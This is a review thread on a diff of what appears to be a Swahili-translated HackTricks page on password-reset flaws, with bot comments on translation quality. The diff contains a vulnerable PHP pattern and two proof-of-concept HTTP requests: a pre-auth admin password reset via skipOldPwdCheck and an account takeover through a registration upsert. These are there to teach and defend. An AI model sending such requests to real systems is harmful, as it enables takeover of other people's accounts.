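Review bot: the heading `## **Session Invalidation in Logout/Password Reset**` / `## **Kufuta Session wakati wa Logout/Password Reset**` appears twice in this hunk, and the second occurrence sits above content about token expiry (`- Reset tokens zinapaswa kuwa na muda wa kumalizika baada yake zitakuwa batili.`), so the duplicate is a copy-paste error that also produces two identical anchors in mdBook; retitle the second section to something like "Reset Token Expiration" in both languages. Other points: the poisoning fix line regresses to English (`- **Patch**: Use $_SERVER['SERVER_NAME'] to construct password reset URLs instead of $_SERVER['HTTP_HOST'].` replaces a translated line); the JSON-array sample still reads `"atracker@mail.tld"` (a typo for attacker, in a context line nobody touched); and the references label is translated as `**Rejea**` in some sections and `**Marejeo**` in others, which should be unified.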
@ -233,9 +233,9 @@ print("[+] Attck stopped")
## Arbitrary password reset via skipOldPwdCheck (pre-auth)
Baadhi ya utekelezaji huweka wazi action ya password change ambayo inaita rutini ya password-change na skipOldPwdCheck=true na haitathibitishi token yoyote ya reset au umiliki. Ikiwa endpoint inakubali parameter ya action kama change_password na username/password mpya ndani ya request body, mshambuliaji anaweza kureset akaunti yoyote kabla ya kuthibitishwa (pre-auth).
Baadhi ya utekelezaji hutoa kitendo cha password change kinachoitisha rotina ya password-change na skipOldPwdCheck=true na hakithibitishi token yoyote ya reset au umiliki. Ikiwa endpoint inakubali parameter ya action kama change_password na username/new password katika request body, mshambuliaji anaweza kufanya reset ya akaunti yoyote pre-auth.
Vulnerable pattern (PHP):
Mfano dhaifu (PHP):
```php
// hub/rpwd.php
RequestHandler::validateCSRFToken();
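Review bot: `Mfano dhaifu (PHP):` reads as "weak example" rather than "vulnerable pattern", which is what the replaced `Vulnerable pattern (PHP):` and the PHP snippet under it describe; a wording such as "Muundo wenye udhaifu (PHP):" keeps the meaning that the code that follows is the flawed version. In the description sentence, "rotina" (new) and "rutini" (old) are neither Swahili nor English; "utaratibu" or simply "routine" in backticks would be clearer. The security fact itself survives both versions and is the one worth keeping exact: the change-password action runs with `skipOldPwdCheck=true` and checks neither a reset token nor ownership.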
@ -255,7 +255,7 @@ $current_user->change_password('oldpwd', $_POST['confirm_new_password'], true, t
emptyUserAuthtokenKey($this->user_auth_token_type, $current_user->id);
}
```
Ombi la Exploitation (dhana):
Exploitation request (dhana):
```http
POST /hub/rpwd.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
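Review bot: `Exploitation request (dhana):` replaces `Ombi la Exploitation (dhana):`, turning the label back into English while keeping the Swahili parenthetical, so the new line is less translated than the old one; keep the previous wording or translate the label fully. The request body below it is unchanged, so no other action is needed in this hunk.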
@ -263,13 +263,26 @@ Content-Type: application/x-www-form-urlencoded
action=change_password&user_name=admin&confirm_new_password=NewP@ssw0rd!
```
Mikakati ya kupunguza hatari:
- Hakikisha kila mara reset token halali, iliyo na muda maalum na iliyounganishwa na account na session inahitajika kabla ya kubadilisha password.
- Usifichue kabisa skipOldPwdCheck paths kwa watumiaji wasiojathibitishwa; lazima utekeleze authentication kwa mabadiliko ya kawaida ya password na uthibitishe password ya zamani.
- Batilisha session zote zinazoendelea na reset tokens zote baada ya mabadiliko ya password.
- Daima weka sharti token halali ya reset yenye muda wa uhalali, iliyounganishwa na akaunti na session kabla ya kubadilisha nenosiri.
- Usifunue njia za skipOldPwdCheck kwa watumiaji wasioidhinishwa; lazimisha uthibitishaji kwa mabadiliko ya kawaida ya nenosiri na thibitisha nenosiri la zamani.
- Ghairi uhalali wa session zote zilizo hai na token za reset baada ya kubadilisha nenosiri.
## Registration-as-Password-Reset (Upsert on Existing Email)
Baadhi ya programu hutekeleza signup handler kama upsert. Ikiwa barua pepe tayari ipo, handler husasisha rekodi ya mtumiaji kimya kimya badala ya kukataa ombi. Wakati registration endpoint inakubali body ndogo ya JSON yenye barua pepe iliyopo na nenosiri jipya, kwa ufanisi inageuka kuwa pre-auth password reset bila ukaguzi wowote wa umiliki, ikiruhusu takeover kamili ya akaunti.
Pre-auth ATO PoC (kuandika nenosiri la mtumiaji aliyepo):
```http
POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json
{"email":"victim@example.com","password":"New@12345"}
```
## Marejeo
- [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token)
- [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
- [Jinsi Nilivyogundua Hitilafu Muhimu ya Password Reset (Registration upsert ATO)](https://s41n1k.medium.com/how-i-found-a-critical-password-reset-bug-in-the-bb-program-and-got-4-000-a22fffe285e1)
{{#include ../banners/hacktricks-training.md}}
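Review bot: the new `## Registration-as-Password-Reset (Upsert on Existing Email)` section gives the PoC but no mitigation, while every other section of this file closes with `Hatua za Kukabiliana` or `Mikakati ya kupunguza hatari`; add the one the paragraph already implies: a registration handler must fail (or respond identically without writing) when the email already exists and must never set a password on an existing record without ownership verification, and logging signup attempts that hit an existing email gives a detection signal for this abuse. The reference title is translated here (`[Jinsi Nilivyogundua Hitilafu Muhimu ya Password Reset (Registration upsert ATO)]`) but left in English in the other file changed by this commit; pick one form for both.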